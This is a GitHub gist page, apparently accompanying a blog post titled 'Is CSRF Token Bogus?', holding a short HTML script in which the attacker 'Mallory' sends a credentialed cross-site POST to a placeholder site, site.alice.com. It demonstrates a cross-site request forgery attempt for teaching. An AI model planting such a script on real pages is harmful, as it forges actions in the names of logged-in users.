SteveLTN/site-mallory-attempt1.html

Last active May 7, 2017 21:04

Star 0 You must be signed in to star a gist
Fork 0 You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/SteveLTN/303f18d0864ade549b8b794494c50c0c.js"></script>
Save SteveLTN/303f18d0864ade549b8b794494c50c0c to your computer and use it in GitHub Desktop.

Download ZIP

Is CSRF Token Bogus? - blog post gist

Raw

site-mallory-attempt1.html

	<script>
	const url = 'http://site.alice.com/posts'
	fetch(url, { method: 'POST', credentials: 'include' })
	</script>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment